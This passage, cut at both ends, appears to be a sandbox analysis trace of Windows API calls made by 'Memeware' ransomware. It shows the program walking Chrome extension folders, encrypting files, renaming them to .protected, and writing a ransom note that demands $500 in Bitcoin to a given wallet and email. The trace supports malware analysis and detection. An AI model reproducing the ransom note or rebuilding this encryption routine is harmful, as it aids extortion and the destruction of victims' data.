liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.084] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.084] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.084] CloseHandle (hObject=0x168) returned 1 [0079.084] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json.protected") returned 165 [0079.084] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json.protected")) returned 1 [0079.085] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.085] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.085] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\RESTORE_FILES.txt") returned 159 [0079.085] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.086] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.086] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.086] lstrlenA (lpString="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") returned 684 [0079.086] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.086] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.086] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0079.087] CloseHandle (hObject=0x164) returned 1 [0079.087] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.087] lstrcmpiW (lpString1="sr", lpString2="Windows") returned -1 [0079.087] lstrcmpiW (lpString1="sr", lpString2="Program Files") returned 1 [0079.087] lstrcmpiW (lpString1="sr", lpString2="Program Files (x86)") returned 1 [0079.087] lstrcmpiW (lpString1="sr", lpString2="$Recycle.bin") returned 1 [0079.087] lstrcmpiW (lpString1="sr", lpString2="System Volume Information") returned -1 [0079.087] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr") returned 141 [0079.087] lstrcmpW (lpString1="sr", lpString2=".") returned 1 [0079.087] lstrcmpW (lpString1="sr", lpString2="..") returned 1 [0079.087] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\*") returned 143 [0079.087] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.087] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.087] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.087] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.087] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.087] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.087] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | 
out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\.") returned 143 [0079.087] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.087] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.087] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.087] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.087] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.087] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.087] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.087] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\..") returned 144 [0079.087] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.087] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.087] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.087] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.087] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.087] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.087] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.087] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.088] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json") 
returned 155 [0079.088] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.088] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.088] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.088] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.088] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.088] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json") returned 155 [0079.088] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.088] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json") returned 155 [0079.089] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.089] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json") returned 155 [0079.089] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.089] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xf8, lpOverlapped=0x0) returned 1 [0079.089] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff08, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.089] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xf8, lpOverlapped=0x0) returned 1 [0079.090] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.090] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.090] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.090] CloseHandle (hObject=0x168) returned 1 [0079.090] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json.protected") returned 165 [0079.090] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json.protected")) returned 1 [0079.090] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.090] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.090] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\RESTORE_FILES.txt") returned 159 [0079.090] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.091] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.091] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.091] lstrlenA (lpString="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") returned 684 [0079.091] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.092] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.092] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0079.092] CloseHandle (hObject=0x164) returned 1 [0079.092] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.092] lstrcmpiW (lpString1="sv", lpString2="Windows") returned -1 [0079.092] lstrcmpiW (lpString1="sv", lpString2="Program Files") returned 1 [0079.092] lstrcmpiW (lpString1="sv", lpString2="Program Files (x86)") returned 1 [0079.092] lstrcmpiW (lpString1="sv", lpString2="$Recycle.bin") returned 1 [0079.092] lstrcmpiW (lpString1="sv", lpString2="System Volume Information") returned -1 [0079.092] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv") returned 141 [0079.092] lstrcmpW (lpString1="sv", lpString2=".") returned 1 [0079.092] lstrcmpW (lpString1="sv", lpString2="..") returned 1 [0079.092] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\*") returned 143 [0079.092] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.092] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.092] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.092] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.092] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.092] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.092] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | 
out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\.") returned 143 [0079.092] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.092] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.092] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.092] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.092] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.092] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.092] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.092] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\..") returned 144 [0079.093] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.093] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.093] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.093] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.093] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.093] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.093] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.093] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.093] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json") 
returned 155 [0079.093] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.093] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.093] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.093] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.093] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.093] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json") returned 155 [0079.093] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.093] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json") returned 155 [0079.093] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.093] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json") returned 155 [0079.093] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.093] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd6, lpOverlapped=0x0) returned 1 [0079.094] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff2a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.094] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd6, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd6, lpOverlapped=0x0) returned 1 [0079.094] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.094] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.095] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.095] CloseHandle (hObject=0x168) returned 1 [0079.095] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json.protected") returned 165 [0079.095] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json.protected")) returned 1 [0079.095] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.095] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.095] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\RESTORE_FILES.txt") returned 159 [0079.096] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.096] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use 